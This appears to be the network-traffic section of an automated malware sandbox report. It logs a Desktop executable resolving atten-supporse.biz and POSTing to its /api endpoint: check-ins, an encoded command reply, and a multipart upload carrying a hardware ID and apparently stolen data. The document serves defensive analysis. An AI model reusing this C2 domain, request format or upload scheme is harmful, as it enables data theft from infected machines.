                                                                                  Dec 9, 2024 22:35:16.855988979 CET44349709104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:16.856174946 CET49709443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:16.856198072 CET49709443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:17.754496098 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:17.754532099 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:17.754796028 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:17.755553007 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:17.755569935 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:18.974591970 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:18.974675894 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:18.976140022 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:18.976147890 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:18.976392031 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:18.984560966 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:18.985416889 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:18.985452890 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:18.985635996 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:18.985673904 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:18.985804081 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:18.985845089 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:18.985970020 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:18.986005068 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:18.986164093 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:18.986197948 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:18.986380100 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:18.986414909 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:18.986423016 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:18.986428976 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:18.986558914 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:18.986583948 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:18.986612082 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:18.987013102 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:18.987051010 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:19.031332970 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:19.034354925 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:19.034388065 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:19.034408092 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:19.034420013 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:19.034440041 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:19.034452915 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:19.034513950 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:19.034528017 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:23.114389896 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:23.114495039 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:23.114564896 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:23.114801884 CET49713443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:23.114818096 CET44349713104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:23.153253078 CET49722443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:23.153296947 CET44349722104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:23.153403044 CET49722443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:23.153778076 CET49722443192.168.2.5104.21.48.1
                                                                                  Dec 9, 2024 22:35:23.153790951 CET44349722104.21.48.1192.168.2.5
                                                                                  Dec 9, 2024 22:35:23.317538023 CET49722443192.168.2.5104.21.48.1
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 9, 2024 22:34:59.339140892 CET6416053192.168.2.51.1.1.1
                                                                                  Dec 9, 2024 22:34:59.640356064 CET53641601.1.1.1192.168.2.5
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Dec 9, 2024 22:34:59.339140892 CET192.168.2.51.1.1.10x6aceStandard query (0)atten-supporse.bizA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Dec 9, 2024 22:34:59.640356064 CET1.1.1.1192.168.2.50x6aceNo error (0)atten-supporse.biz104.21.48.1A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 22:34:59.640356064 CET1.1.1.1192.168.2.50x6aceNo error (0)atten-supporse.biz104.21.16.1A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 22:34:59.640356064 CET1.1.1.1192.168.2.50x6aceNo error (0)atten-supporse.biz104.21.96.1A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 22:34:59.640356064 CET1.1.1.1192.168.2.50x6aceNo error (0)atten-supporse.biz104.21.80.1A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 22:34:59.640356064 CET1.1.1.1192.168.2.50x6aceNo error (0)atten-supporse.biz104.21.112.1A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 22:34:59.640356064 CET1.1.1.1192.168.2.50x6aceNo error (0)atten-supporse.biz104.21.64.1A (IP address)IN (0x0001)false
                                                                                  Dec 9, 2024 22:34:59.640356064 CET1.1.1.1192.168.2.50x6aceNo error (0)atten-supporse.biz104.21.32.1A (IP address)IN (0x0001)false
                                                                                  • atten-supporse.biz
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.549704104.21.48.14432876C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-09 21:35:00 UTC265OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 8
                                                                                  Host: atten-supporse.biz
                                                                                  2024-12-09 21:35:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                  Data Ascii: act=life
                                                                                  2024-12-09 21:35:01 UTC1015INHTTP/1.1 200 OK
                                                                                  Date: Mon, 09 Dec 2024 21:35:01 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=5bqmn2oth4tkb85ut6k8efpr0u; expires=Fri, 04-Apr-2025 15:21:40 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HtxWJfxqtWaXQrck%2FSWf5nvnLMDxt4mN9UJbu%2B33nezSvRY0rW82es020YQ39XtNfRM4J9eNsin9FtWFPH5QgylvwRJGKapxYCpXIVFK%2FQlIyn8pfFZWAqmhe490aIBrBY6KEsA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef81f60188443b0-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1577&rtt_var=613&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1755862&cwnd=32&unsent_bytes=0&cid=f1d864b52e8d80ba&ts=1066&x=0"
                                                                                  2024-12-09 21:35:01 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                  Data Ascii: 2ok
                                                                                  2024-12-09 21:35:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.549705104.21.48.14432876C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-09 21:35:03 UTC266OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 53
                                                                                  Host: atten-supporse.biz
                                                                                  2024-12-09 21:35:03 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                  2024-12-09 21:35:04 UTC1022INHTTP/1.1 200 OK
                                                                                  Date: Mon, 09 Dec 2024 21:35:04 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=7qidgm5qsf7mk2c9ik6hrttvnm; expires=Fri, 04-Apr-2025 15:21:42 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ONFrtvcgqdN8j4bGAp1ZMRS9e%2FjmU8C2B7aEYjT%2BeiLXRBFKqxmQYksJKzaCo%2BdyZuEBjWNtAQ1%2BEnV%2Fc7rThSZd9065gi2l9i6NacVzxyoxIT0DBg61Q5pfWBXAFL%2Fdky1wv0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef81f6e99e37ced-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2038&min_rtt=1849&rtt_var=829&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1579232&cwnd=179&unsent_bytes=0&cid=fe09a6bfff3d0f11&ts=1377&x=0"
                                                                                  2024-12-09 21:35:04 UTC347INData Raw: 34 39 31 63 0d 0a 6a 71 51 6d 77 51 75 4a 43 63 5a 6b 67 78 35 52 47 45 69 48 49 56 46 71 32 76 41 65 66 67 47 43 69 32 6c 55 4a 75 46 34 43 6f 66 31 68 6c 44 6a 4d 62 30 6c 35 42 66 6d 50 47 74 73 4f 76 4a 45 66 55 69 37 6c 44 78 45 5a 2b 50 6e 47 6a 45 4b 77 77 35 6e 70 62 54 43 52 36 31 34 37 43 58 6b 41 66 73 38 61 30 4d 7a 70 55 51 2f 53 4f 44 53 65 78 52 6a 34 2b 63 4c 4e 55 32 4f 43 47 62 6b 35 73 68 42 71 57 37 71 62 61 63 49 37 6e 73 30 66 53 6e 74 54 7a 67 48 73 70 30 38 55 69 50 6e 38 55 74 75 42 4b 77 64 66 75 62 44 78 56 57 71 4b 66 51 6c 76 55 62 6d 63 48 4d 69 61 75 5a 45 4d 77 61 38 6c 48 55 57 61 65 72 76 43 6a 42 4d 6b 52 46 73 37 2b 62 47 51 71 68 6b 34 33 6d 71 41 75 6c 77 4d 6e 63 70 70 51 31 7a 44 36 44 53 4a 46 77 77 30 75 6f 61 4a
                                                                                  Data Ascii: 491cjqQmwQuJCcZkgx5RGEiHIVFq2vAefgGCi2lUJuF4Cof1hlDjMb0l5BfmPGtsOvJEfUi7lDxEZ+PnGjEKww5npbTCR6147CXkAfs8a0MzpUQ/SODSexRj4+cLNU2OCGbk5shBqW7qbacI7ns0fSntTzgHsp08UiPn8UtuBKwdfubDxVWqKfQlvUbmcHMiauZEMwa8lHUWaervCjBMkRFs7+bGQqhk43mqAulwMncppQ1zD6DSJFww0uoaJ
                                                                                  2024-12-09 21:35:04 UTC1369INData Raw: 62 53 47 51 71 31 6f 35 6d 75 32 44 75 70 33 4e 6d 67 68 37 45 34 2b 43 4c 57 59 63 78 39 6a 35 2b 4d 42 4f 55 36 48 46 32 58 6a 37 4d 59 45 37 53 6e 73 63 2b 52 65 6f 56 38 32 61 69 33 70 56 58 45 79 2b 49 30 79 42 53 50 6e 35 55 74 75 42 49 73 66 61 2b 62 6e 79 55 65 72 59 76 6c 72 74 67 44 73 65 53 46 38 4c 2b 74 4a 4d 42 71 79 6e 48 6f 66 61 75 76 67 44 6a 46 41 77 31 51 6f 34 76 53 47 48 4f 4e 49 35 6d 43 6f 44 50 5a 38 63 32 56 6b 2f 41 4d 30 42 50 6a 4b 50 42 68 69 35 4f 67 50 4f 45 71 48 46 6d 37 72 34 63 6c 43 71 57 6e 73 59 61 77 4f 34 48 45 34 64 53 72 67 54 6a 63 4f 74 4a 4e 35 58 43 32 67 37 68 4e 32 48 4d 4d 30 62 2b 62 2b 68 48 47 67 5a 2b 56 73 73 6b 62 2b 4d 69 6f 36 4c 65 6b 44 61 30 69 32 6c 33 4d 4f 59 76 4c 73 42 53 52 49 68 68 78 6c
                                                                                  Data Ascii: bSGQq1o5mu2Dup3Nmgh7E4+CLWYcx9j5+MBOU6HF2Xj7MYE7Snsc+ReoV82ai3pVXEy+I0yBSPn5UtuBIsfa+bnyUerYvlrtgDseSF8L+tJMBqynHofauvgDjFAw1Qo4vSGHONI5mCoDPZ8c2Vk/AM0BPjKPBhi5OgPOEqHFm7r4clCqWnsYawO4HE4dSrgTjcOtJN5XC2g7hN2HMM0b+b+hHGgZ+Vsskb+Mio6LekDa0i2l3MOYvLsBSRIhhxl
                                                                                  2024-12-09 21:35:04 UTC1369INData Raw: 47 67 5a 2b 56 73 73 6b 62 2b 4d 69 6f 36 4c 65 6b 44 61 30 69 31 6d 6e 6b 5a 62 4f 48 6a 42 54 4e 4f 6a 78 4a 6d 35 76 37 4a 51 4b 4e 6c 34 32 47 70 43 4f 56 30 4f 6e 45 68 34 30 4d 79 41 76 6a 63 50 42 74 37 6f 4c 46 4c 41 6b 4f 50 46 32 65 6e 32 63 56 4b 72 57 37 39 4b 37 74 49 2b 44 77 30 64 6d 71 39 41 7a 38 42 75 4a 6c 32 47 47 50 6e 35 41 34 31 51 34 41 58 62 2b 2f 69 77 55 43 76 59 4f 5a 74 70 41 48 6c 65 53 46 2f 49 2b 6c 50 63 30 62 34 6c 57 52 63 4f 36 44 47 44 43 42 48 72 42 6c 35 37 4b 7a 5a 43 72 6f 70 37 47 66 6b 58 71 46 37 4e 6e 49 68 34 30 73 7a 47 72 32 63 64 78 31 70 35 75 67 47 4f 6b 4b 44 47 32 6a 6a 34 4d 5a 44 70 48 76 35 62 71 49 55 36 7a 78 39 4f 69 33 39 41 32 74 49 6a 6f 4a 72 44 58 57 69 33 41 67 34 53 6f 51 4d 4b 50 71 69 33
                                                                                  Data Ascii: GgZ+Vsskb+Mio6LekDa0i1mnkZbOHjBTNOjxJm5v7JQKNl42GpCOV0OnEh40MyAvjcPBt7oLFLAkOPF2en2cVKrW79K7tI+Dw0dmq9Az8BuJl2GGPn5A41Q4AXb+/iwUCvYOZtpAHleSF/I+lPc0b4lWRcO6DGDCBHrBl57KzZCrop7GfkXqF7NnIh40szGr2cdx1p5ugGOkKDG2jj4MZDpHv5bqIU6zx9Oi39A2tIjoJrDXWi3Ag4SoQMKPqi3
                                                                                  2024-12-09 21:35:04 UTC1369INData Raw: 6b 59 62 59 4f 37 33 45 34 64 53 48 33 51 7a 34 4d 74 4a 5a 30 46 32 6d 67 70 30 73 78 58 4d 4e 43 4b 4e 44 68 79 55 53 67 66 36 74 30 36 68 2b 68 65 7a 38 36 63 71 56 50 50 51 69 33 6e 6e 41 58 61 2b 48 6c 42 54 46 42 69 68 4a 67 39 2b 33 43 54 4b 4a 6e 35 47 71 67 41 2b 52 34 4e 48 34 73 36 67 4e 39 53 4c 2b 4b 50 45 51 6a 7a 38 34 2b 64 47 57 35 57 6e 65 72 39 59 5a 44 72 79 6d 7a 4b 36 67 46 37 58 51 38 66 43 50 70 53 54 6f 44 74 4a 6c 34 45 47 72 6c 37 77 6f 7a 51 59 49 65 5a 4f 2f 71 78 55 65 73 5a 75 52 6a 35 45 69 68 65 79 73 36 63 71 56 6d 4a 41 4f 32 6c 44 77 44 4c 66 6d 70 44 44 6f 45 32 31 70 6b 37 4f 72 41 51 61 39 6f 37 57 4f 68 44 75 56 39 4e 58 77 70 36 6b 63 32 43 62 65 57 63 42 4a 70 34 65 67 48 50 55 75 49 48 79 69 72 72 4d 46 63 34 7a
                                                                                  Data Ascii: kYbYO73E4dSH3Qz4MtJZ0F2mgp0sxXMNCKNDhyUSgf6t06h+hez86cqVPPQi3nnAXa+HlBTFBihJg9+3CTKJn5GqgA+R4NH4s6gN9SL+KPEQjz84+dGW5Wner9YZDrymzK6gF7XQ8fCPpSToDtJl4EGrl7wozQYIeZO/qxUesZuRj5Eiheys6cqVmJAO2lDwDLfmpDDoE21pk7OrAQa9o7WOhDuV9NXwp6kc2CbeWcBJp4egHPUuIHyirrMFc4z
                                                                                  2024-12-09 21:35:04 UTC1369INData Raw: 43 75 5a 35 4f 48 55 6d 70 51 31 7a 44 36 44 53 4a 46 78 4e 36 2f 6f 63 4e 55 71 49 44 48 4f 6c 38 34 68 64 34 32 37 6e 4b 2f 78 47 34 6e 63 34 66 69 72 70 51 7a 63 46 75 49 42 7a 47 32 54 70 34 68 6b 38 51 34 51 52 59 4f 37 6a 77 46 61 76 5a 2f 6c 75 74 68 53 68 4d 6e 4e 39 4d 71 55 62 63 7a 36 2f 67 6d 77 66 49 64 48 2f 43 43 42 50 6a 68 59 6f 2b 71 4c 66 42 4b 52 6c 71 7a 50 6b 41 4f 35 31 4d 48 55 72 37 45 38 2b 44 62 47 58 66 52 70 6e 36 75 4d 4c 4d 45 4b 43 48 32 4c 6d 37 63 78 4e 70 47 48 73 61 4c 5a 47 72 7a 77 30 59 6d 71 39 41 78 6f 50 71 70 78 73 58 48 79 75 38 45 73 78 53 4d 4e 43 4b 4f 48 6d 79 55 43 6b 5a 65 31 75 6f 67 76 67 63 7a 4a 36 4a 65 46 49 4f 67 36 35 6e 33 6b 52 5a 2f 4c 6a 41 44 6c 49 69 68 5a 6c 70 61 4b 47 51 37 73 70 73 79 75
                                                                                  Data Ascii: CuZ5OHUmpQ1zD6DSJFxN6/ocNUqIDHOl84hd427nK/xG4nc4firpQzcFuIBzG2Tp4hk8Q4QRYO7jwFavZ/luthShMnN9MqUbcz6/gmwfIdH/CCBPjhYo+qLfBKRlqzPkAO51MHUr7E8+DbGXfRpn6uMLMEKCH2Lm7cxNpGHsaLZGrzw0Ymq9AxoPqpxsXHyu8EsxSMNCKOHmyUCkZe1uogvgczJ6JeFIOg65n3kRZ/LjADlIihZlpaKGQ7spsyu
                                                                                  2024-12-09 21:35:04 UTC1369INData Raw: 44 35 77 4f 4f 39 49 4e 67 57 31 6e 33 38 61 5a 65 76 6c 47 54 39 45 67 42 45 6f 71 36 7a 42 58 4f 4d 78 71 30 69 7a 45 4f 74 37 50 32 77 68 35 45 41 6c 42 61 6a 53 4d 6c 78 79 35 2f 68 4c 62 6c 4b 54 44 57 2f 36 6f 74 38 45 70 47 57 72 4d 2b 51 41 36 48 6f 30 66 43 54 33 52 6a 55 48 74 35 74 31 47 47 76 6a 36 51 38 79 51 34 59 5a 5a 4f 37 72 78 55 75 6e 59 4f 56 69 71 30 61 76 50 44 52 69 61 72 30 44 45 68 4f 37 6e 6e 46 63 66 4b 37 77 53 7a 46 49 77 30 49 6f 36 65 4c 44 52 4b 6c 76 37 32 36 69 44 4f 52 38 4f 48 6b 6c 34 55 55 33 42 37 69 5a 64 52 31 6c 35 65 4d 41 4d 45 6d 41 48 47 36 6c 6f 6f 5a 44 75 79 6d 7a 4b 34 51 64 37 48 41 30 4f 6a 57 72 57 6e 4d 50 74 4e 49 6b 58 47 6a 73 37 51 77 32 53 59 41 53 62 65 48 6d 77 30 53 72 65 2b 4e 72 6f 78 54 7a
                                                                                  Data Ascii: D5wOO9INgW1n38aZevlGT9EgBEoq6zBXOMxq0izEOt7P2wh5EAlBajSMlxy5/hLblKTDW/6ot8EpGWrM+QA6Ho0fCT3RjUHt5t1GGvj6Q8yQ4YZZO7rxUunYOViq0avPDRiar0DEhO7nnFcfK7wSzFIw0Io6eLDRKlv726iDOR8OHkl4UU3B7iZdR1l5eMAMEmAHG6looZDuymzK4Qd7HA0OjWrWnMPtNIkXGjs7Qw2SYASbeHmw0Sre+NroxTz
                                                                                  2024-12-09 21:35:04 UTC1369INData Raw: 71 39 41 77 31 49 71 70 46 73 48 32 7a 78 31 30 74 75 58 62 31 61 59 2f 50 72 31 6b 65 31 59 75 5a 6e 74 54 69 68 4a 47 63 6f 65 4c 63 52 59 52 66 34 6a 55 4e 53 49 2b 47 70 55 77 39 64 77 77 77 6f 76 62 36 49 42 4c 45 70 73 79 76 6a 42 66 4e 75 4e 58 6b 38 35 67 51 4e 4e 70 2b 45 64 68 74 7a 35 2f 34 45 64 67 72 44 46 53 69 39 31 59 5a 4e 70 48 4c 36 66 61 6b 57 35 6a 77 4d 4e 47 72 39 41 32 74 49 6a 5a 46 79 45 6d 54 32 2b 45 59 52 55 6f 6b 64 65 4f 4c 37 79 51 54 74 4b 65 30 72 2f 46 57 76 50 44 64 72 61 72 30 54 59 56 50 74 77 53 74 4d 4d 66 2b 6e 45 6e 5a 53 77 30 49 36 71 36 7a 55 42 50 73 70 72 47 69 32 46 4f 64 2f 4a 58 6c 74 32 33 30 55 45 72 57 55 61 77 31 64 33 75 34 52 4f 30 4b 55 43 79 54 77 37 38 68 4b 70 48 2b 72 4a 65 51 4a 6f 53 51 4b 4f
                                                                                  Data Ascii: q9Aw1IqpFsH2zx10tuXb1aY/Pr1ke1YuZntTihJGcoeLcRYRf4jUNSI+GpUw9dwwwovb6IBLEpsyvjBfNuNXk85gQNNp+Edhtz5/4EdgrDFSi91YZNpHL6fakW5jwMNGr9A2tIjZFyEmT2+EYRUokdeOL7yQTtKe0r/FWvPDdrar0TYVPtwStMMf+nEnZSw0I6q6zUBPsprGi2FOd/JXlt230UErWUaw1d3u4RO0KUCyTw78hKpH+rJeQJoSQKO
                                                                                  2024-12-09 21:35:04 UTC1369INData Raw: 7a 55 4f 6a 41 4a 30 6b 77 74 37 6c 5a 4b 51 71 61 57 6e 36 6c 74 4a 51 4b 34 33 75 72 4d 2b 52 42 34 6d 34 68 66 43 6e 7a 51 48 51 32 68 72 56 79 47 32 4c 32 2b 52 77 35 65 72 30 50 61 2b 76 69 77 56 4b 79 4b 61 55 72 71 30 61 35 52 58 4d 79 61 74 6f 4e 63 78 44 34 79 6a 77 70 59 4f 37 6e 44 43 42 56 7a 6a 31 6d 34 75 33 51 56 4c 52 6d 71 79 58 6b 41 4b 45 6b 59 54 52 71 34 56 4a 7a 55 4f 6a 41 4a 30 6b 77 74 37 6c 5a 4b 51 71 61 57 6e 36 6c 74 4a 51 4b 34 33 75 72 4d 2b 52 42 34 6d 34 68 66 43 6e 7a 51 48 51 32 68 72 56 79 47 32 4c 32 2b 52 77 35 43 36 30 73 53 64 76 53 30 30 65 74 5a 2b 78 39 74 55 61 76 50 44 77 36 63 74 77 44 65 30 69 48 33 44 77 45 49 37 69 70 50 6a 56 4b 6a 52 31 2b 39 4b 48 68 53 71 52 6f 2f 58 75 7a 43 61 35 53 42 56 74 71 71 77
                                                                                  Data Ascii: zUOjAJ0kwt7lZKQqaWn6ltJQK43urM+RB4m4hfCnzQHQ2hrVyG2L2+Rw5er0Pa+viwVKyKaUrq0a5RXMyatoNcxD4yjwpYO7nDCBVzj1m4u3QVLRmqyXkAKEkYTRq4VJzUOjAJ0kwt7lZKQqaWn6ltJQK43urM+RB4m4hfCnzQHQ2hrVyG2L2+Rw5C60sSdvS00etZ+x9tUavPDw6ctwDe0iH3DwEI7ipPjVKjR1+9KHhSqRo/XuzCa5SBVtqqw
                                                                                  2024-12-09 21:35:04 UTC1369INData Raw: 67 6e 73 69 58 63 33 37 44 43 5a 48 77 53 74 2b 35 75 7a 49 51 2b 4d 6e 71 33 50 6b 58 71 46 52 49 58 30 36 35 67 4e 39 53 4c 54 53 4a 46 78 75 38 75 34 62 4e 51 69 45 41 47 2b 6c 38 34 68 64 34 33 2b 72 4d 2f 64 49 6f 57 35 7a 49 6d 71 69 54 54 34 4a 75 35 78 2f 44 6e 48 6d 36 68 30 31 41 37 30 6b 52 66 66 72 31 6b 66 68 57 4f 5a 76 73 68 50 69 62 44 52 45 46 4d 68 52 4e 42 69 37 30 46 41 62 62 75 7a 58 4e 51 46 56 68 41 6f 71 77 2b 2f 51 52 2b 4d 6e 71 33 50 6b 58 71 46 52 49 58 30 36 35 67 45 66 44 37 57 65 50 41 4d 74 2b 61 6b 64 64 68 7a 51 56 43 6a 33 72 4a 34 45 35 47 72 35 65 61 49 46 39 33 39 30 52 42 54 49 55 54 51 59 75 39 42 4e 45 57 66 32 2f 41 67 6d 51 37 30 6b 52 66 66 72 31 6b 66 68 54 4e 45 70 6c 52 44 69 66 44 31 39 61 71 73 44 4b 30 6a
                                                                                  Data Ascii: gnsiXc37DCZHwSt+5uzIQ+Mnq3PkXqFRIX065gN9SLTSJFxu8u4bNQiEAG+l84hd43+rM/dIoW5zImqiTT4Ju5x/DnHm6h01A70kRffr1kfhWOZvshPibDREFMhRNBi70FAbbuzXNQFVhAoqw+/QR+Mnq3PkXqFRIX065gEfD7WePAMt+akddhzQVCj3rJ4E5Gr5eaIF9390RBTIUTQYu9BNEWf2/AgmQ70kRffr1kfhTNEplRDifD19aqsDK0j


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.549706104.21.48.14432876C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-09 21:35:06 UTC279OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=NRG4EX5TSVGAG
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 12811
                                                                                  Host: atten-supporse.biz
                                                                                  2024-12-09 21:35:06 UTC12811OUTData Raw: 2d 2d 4e 52 47 34 45 58 35 54 53 56 47 41 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 36 36 41 39 44 36 31 43 44 37 37 46 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4e 52 47 34 45 58 35 54 53 56 47 41 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 52 47 34 45 58 35 54 53 56 47 41 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4e 52 47 34 45
                                                                                  Data Ascii: --NRG4EX5TSVGAGContent-Disposition: form-data; name="hwid"EA66A9D61CD77F8D23D904AF30EFEBBC--NRG4EX5TSVGAGContent-Disposition: form-data; name="pid"2--NRG4EX5TSVGAGContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--NRG4E
                                                                                  2024-12-09 21:35:08 UTC1016INHTTP/1.1 200 OK
                                                                                  Date: Mon, 09 Dec 2024 21:35:08 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
